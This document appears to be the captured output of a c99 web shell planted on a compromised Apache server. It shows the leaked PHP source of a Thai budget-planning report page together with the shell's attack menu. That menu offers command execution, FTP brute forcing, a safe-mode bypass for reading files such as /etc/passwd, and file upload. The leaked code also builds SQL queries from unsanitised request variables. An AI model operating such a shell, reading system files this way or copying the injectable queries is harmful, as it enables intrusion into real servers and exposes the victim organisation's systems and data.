!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MISP103.php (16.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../includes/Function.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
    
        
/**  Chart  */
        
include ("../includes/charts.php");

        
        
/**  Config Table for This Page  */
        
$myTable "project_type_tb";
        
$myTable1 "project_tb";
        
$myTablePK "Faculty_code";
        
$myTable2 "money_source_tb";
        
$myTablePK2 "MoneyS_C";
        
$myTable3 "faculty_tb";
    

        
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>

<title>แผนการดำเนินงาน</title>
<script type="text/javascript">
<!--
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">

<table width="1054" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="1054" align="left" valign="top" style="padding:10px 0px 5px 10px">
          <fieldset><legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php">หน้าหลัก</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Menu_Report.php?Budget_Year=<?=$Budget_Year ;?>">รายงานประเภทต่างๆ</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font></font><span class="NOTE">แผนการจัดสรรงบประมาณประจำปีจำแนกตามฝ่าย/พันธกิจและประเภทเงิน</a></font></span></legend>
        <table width="1033" border="0" cellspacing="0" cellpadding="0">
          <form id="myForm" name="myForm" method="post" action="<?=$PHP_SELF;?>?Budget_Year=<?=$Budget_Year;?>&amp;ProjectId=<?=$ProjectId;?>&amp;MoneyS_C=<?=$MoneyS_C;?>&amp;page=<?=$page;?>">
            <tr>
              <td width="1033" height="5" colspan="2"></td>
            </tr>
            <tr>
              <td colspan="2"><table width="99%" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td align="left" style="padding-bottom:5px;"><span class="PADDING-TOP-10 PADDING-BOTTOM-5"><img src="../images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ย้อนกลับ</strong></a></span></td>
                    <td align="right" style="padding-bottom:5px;"><select name="jumpMenu" id="jumpMenu" onchange="MM_jumpMenu('parent',this,0)">
                        <option>
                          <?php
                                   $strSQL 
" SELECT * FROM   project_year    ORDER by Budget_Year asc    ";
                                
$result4 mysql_query($strSQL);
                                while( 
$rs4 mysql_fetch_array($result4) ) {
                            
?>
                        </option>
                        <option value="SpendingSum.php?Budget_Year=<?=$rs4['Budget_Year'];?><?php if( $rs4['Budget_Year']==$Budget_Year ) echo 'selected'?>>
                          <?=$rs4['Budget_Year'];?>
                        </option>
                        <?php
                                
# while
                            
?>
                      </select>
                    </td>
                  </tr>
                  <tr>
                    <td width="74%" align="left" style="padding-bottom:5px;">ทั้งหมด: <strong><?=$numrows;?></strong> รายการ</td>
                    <td width="26%" align="right" style="padding-bottom:5px;"><a href="ExcelSpendingSum.php?Budget_Year=<? echo $Budget_Year?>"><strong>ส่งออกข้อมูล &rsaquo;</strong></a> <img src="../images/icons/excel.png" width="16" height="16" border="0" align="absmiddle" /></td>
                  </tr>
              </table></td>
            </tr>
            <tr>
              <td height="122" colspan="2" align="center" valign="top"><table width="1019" border="0" align="center" cellpadding="1" cellspacing="0" class="BORDER-GREY">
                <tr bgcolor="#F8F8F8">
                  <td width="28" rowspan="2" align="center"  class="BORDER-RIGHT">No</td>
                  <td width="358" rowspan="2" align="center" bgcolor="#F8F8F8">ชื่อหน่วยงาน</td>
                  <td height="23" colspan="3" align="center" class="BORDER-LEFT">งบประมาณที่อนุมัติ</td>
                  <td colspan="2" align="center" class="BORDER-LEFT">ประเภทของเงิน</td>
                  <td colspan="2" align="center" class="BORDER-LEFT">รวมเงิน</td>
                  </tr>
                  <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td width="114" height="23" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">งานยุทธศาสตร์</td>
                  <td width="100" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">งานประจำ</td>
                  <td width="99" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">รวม</td>
                  <td width="79" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td width="86" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td width="75" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">จำนวน</td>
                  <td width="54" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">ร้อยละ</td>
                </tr>
                 <?php 
                 $query 
" SELECT *  FROM  faculty_tb  Where   FacultyStatus ='Y'    ";
                 
$result $dbObj->execQuery($query);
                 
$numrows $dbObj->_numrows;
               
$no 1+($display-1)*$limit;
            while( 
$rs $dbObj->fetchArray($result) ) { 
                
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF";
                
                
$Faculty_code $rs['Faculty_code'];
          
?>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td align="center" class="BORDER-TOP-RIGHT"><?=$no;?></td>
                  <td height="23" align="left" class="BORDER-TOP PADDING-LEFT-3">&nbsp;<strong><?php echo $rs['Faculty_name']; ?></strong></td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='1'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                    <?php
                    
/*
                    
                   $sql4 = "  SELECT SUM(Budget_total) AS SumC6  FROM   project_type_tb pt, projectstra_type_tb ps ,proplanstrateg_tb pj , prostrategymap_tb pm  Where  pt.Faculty_code='$rs[Faculty_code]'  and   pt.proId=ps.proId  and   ps.StratempId=pj.StratempId  and  pj.StratempId=pm.StratempId  and  ps.StaplanId=pj.StaplanId  and  pt.Budget_Year='$Budget_Year' ";
                   $result4 = $dbObj->execQuery($sql4);
                   $rss4 = $dbObj->fetchArray($result4);
                       echo number_format($rss4['SumC6'],2,'.',',');
                */    
           
?> </strong>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='2'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?></strong>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'    ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?></strong>
                 </td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'    ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </strong></td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">
                    <?php  
                 $sql 
" SELECT SUM(Budget_total) AS  C6  FROM   project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'   ";
                
$result3 $dbObj->execQuery($sql);
                
$rss $dbObj->fetchArray($result3);            
                
$sql " SELECT SUM(Budget_total) AS B1  FROM  project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  ";
                    
$result2 $dbObj->execQuery($sql);
                    
$rss2 $dbObj->fetchArray($result2);
                    
                    
$per2= ( $rss['C6'] * 100 ) / $rss2['B1']  ;
                        echo 
number_format($per2,'2','.','')." %"
                
?>
                 </td>
                </tr>
                <?php
                $sql 
" SELECT * FROM  facultycon_tb  Where  Faculty_code='$rs[Faculty_code]'    " ;
                
$result19 $dbObj->execQuery($sql); 
               
$ni 1+($display-1)*$limit;
           while( 
$rss $dbObj->fetchArray($result19) ) { 
                
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF";
          
?>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td align="center" class="BORDER-TOP-RIGHT">&nbsp;</td>
                  <td height="23" align="left" class="BORDER-TOP">&nbsp;&nbsp;
                    <?=$ni;?>
                    .<?=$rss['Group_name']; ?>
                    </a></td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.conId='$rss[conId]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='1'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                    <?php
                    
/*
                   $sql4 = "  SELECT SUM(Budget_total) AS SumC6  FROM   project_type_tb pt, projectstra_type_tb ps ,proplanstrateg_tb pj , prostrategymap_tb pm  Where  pt.Faculty_code='$rs[Faculty_code]'  and   pt.proId=ps.proId  and   ps.StratempId=pj.StratempId  and  pj.StratempId=pm.StratempId  and  ps.StaplanId=pj.StaplanId  and  pt.Budget_Year='$Budget_Year' ";
                   $result4 = $dbObj->execQuery($sql4);
                   $rss4 = $dbObj->fetchArray($result4);
                       echo number_format($rss4['SumC6'],2,'.',',');
                    */
           
?>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.conId='$rss[conId]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='2'  ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.conId='$rss[conId]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'    ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <?php 
               $ni
++;
            } 
# while 
          
?>
                  <?php 
               $no
++;
            } 
# while 
          
?>
                </tr>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td height="19" colspan="2" align="center" bgcolor="#FFCCCC" class="BORDER-TOP"><strong>รวม</strong></td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='1'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?></td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='2'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                 </td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="center" bgcolor="#FFCCCC" class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center" bgcolor="#FFCCCC" class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="center" bgcolor="#FFCCCC" class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                </tr>
              </table>
                
                <table width="750" border="0" cellspacing="0" cellpadding="0">
                  <tr>
      <td align="center"></td>
      </tr>
  </table>
</td>
            </tr>
            <tr>
              <td colspan="2">&nbsp;</td>
        </tr></form></table>
    </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--